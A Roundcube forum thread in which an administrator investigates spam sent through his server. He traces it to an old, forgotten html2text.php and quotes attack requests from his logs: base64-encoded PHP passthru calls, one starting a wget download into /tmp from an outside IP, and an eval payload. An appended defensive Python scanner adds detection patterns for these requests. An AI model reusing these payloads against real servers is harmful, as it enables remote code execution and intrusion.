Roundcube Community Forum

News and Announcements => General Discussion => Topic started by: adaviel on August 07, 2013, 05:16:12 PM

Title: Possible exploit in 0.8.5 ?
Post by: adaviel on August 07, 2013, 05:16:12 PM
I installed 0.8.5 a few months ago to evaluate, but I don't actively use it. I have Apache httpd-2.2.3-63-el, php-5.1.6-39-el on RedHat 5.2, admittedly not the latest updates for EL, which are 2.2.3-78 and .1.6-40.el5.


I'm trying to track down some process that has managed to send a load of spam through my server - while I was away at a conference, of course.... I still haven't found a smoking gun, but sendmail has "apache set sender to no-replay@ups.com using -f" and I found a few entries in Apache logs like:
POST /roundcube/bin/html2text.php
(although not nearly enough to account for all the spam logged by sendmail)

This isn't the previously patched vulnerability in user preferences - I don't have any active users, and there are no GETs in the logs, only these POSTs.

I don't have full network logging, but there's curious looking stuff that I do have, viz.
POST /roundcube/bin/html2text.php
    Accept: cGFzc3RocnUoImVjaG8gLW47Iik7Cg==\r\n
Data: <b>{${EVAL(BASE64_DECODE($_SE...
POST /roundcube/bin/html2text.php
    Accept: cGFzc3RocnUoImVjaG8gLW47Y2QgL3RtcDsgd2dldCAxNzQuMTIxLjczLjE2Mi9pY....

Those HTTP Accept strings are base-64 encoded versions of:
  passthru("echo -n;");
  passthru("echo -n;cd /tmp; wget ....
which looks decidedly suspicious.

I'm not sure if this issue is with RoundCube, or PHP, or Apache, or some config entry I broke.

Title: Re: Possible exploit in 0.8.5 ?
Post by: SKaero on August 07, 2013, 08:19:24 PM
There is a problem with the path you posted, "/roundcube/bin/html2text.php": there isn't and never has been an html2text.php file in RoundCube's bin folder. It has most likely been added by something malicious. I don't know of any vulnerability in RoundCube 0.8.x, but it does require PHP 5.2.1 or greater, so you may have opened up a hole within PHP.

Title: Re: Possible exploit in 0.8.5 ?
Post by: adaviel on August 08, 2013, 02:47:15 AM
In roundcubemail-0.8.5.tar.gz
there is a roundcubemail-0.8.5/program/lib/html2text.php

But yes, it looks like I have an old html2text.php I'd forgotten about from 2008, probably 0.1-STABLE.
That matches http://trac.roundcube.net/ticket/1485618

I guess there are still some scanners around looking for this. The attacker went straight to the POST operation and did not do any other HTTP operations from the same address, and nothing else appears to have accessed that or any other roundcube URLs in the past month.
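
A defender-side check for the pattern described in this thread, added here as an example (not code from the thread's participants or the Roundcube project): it scans captured HTTP requests for POSTs to html2text.php whose header values are base64 that decodes to PHP execution calls, or whose body carries the `{${` marker seen in the logged data. The record layout (`src`, `method`, `path`, `headers`, `body`), the function names and the sample addresses are assumptions; the Accept value and the truncated body are the ones quoted in the first post.

```python
import base64
import re

# Command/code-execution PHP calls; passthru and eval are the two seen in the post.
PHP_EXEC = re.compile(r"\b(passthru|system|shell_exec|exec|popen|eval)\s*\(", re.I)
TARGET = re.compile(r"/html2text\.php$", re.I)
BODY_MARKER = "{${"  # PHP complex-variable syntax, as in the logged POST data

def decode_header(value):
    """Return the decoded text if value is strict base64 of printable ASCII, else None."""
    try:
        # validate=True rejects ordinary header values containing ',', ';' or '*'.
        text = base64.b64decode(value.strip(), validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    ok = text.strip() and all(c.isprintable() or c in "\r\n\t" for c in text)
    return text.strip() if ok else None

def scan(requests):
    """Return (src, path, reason, detail) for suspicious POSTs to html2text.php."""
    findings = []
    for req in requests:
        path = req["path"].split("?", 1)[0]
        if req["method"] != "POST" or not TARGET.search(path):
            continue
        for name, value in req["headers"].items():
            decoded = decode_header(value)
            if decoded and PHP_EXEC.search(decoded):
                findings.append((req["src"], path, "encoded-php-in-" + name.lower(), decoded))
        if BODY_MARKER in req.get("body", ""):
            findings.append((req["src"], path, "php-interpolation-in-body", req["body"]))
    return findings

# Constructed sample records; source addresses are documentation ranges.
SAMPLE = [
    {"src": "192.0.2.10", "method": "POST", "path": "/roundcube/bin/html2text.php",
     "headers": {"Accept": "cGFzc3RocnUoImVjaG8gLW47Iik7Cg=="},
     "body": "<b>{${EVAL(BASE64_DECODE($_SE..."},  # truncated exactly as in the post
    {"src": "198.51.100.7", "method": "POST", "path": "/roundcube/bin/html2text.php",
     "headers": {"Accept": "text/xml"}, "body": "<p>hello</p>"},
    {"src": "198.51.100.8", "method": "GET", "path": "/roundcube/",
     "headers": {"Accept": "text/html,*/*;q=0.8"}, "body": ""},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The `text/xml` record is there because that value happens to be valid base64; it is dropped only because its decoded bytes are not printable ASCII.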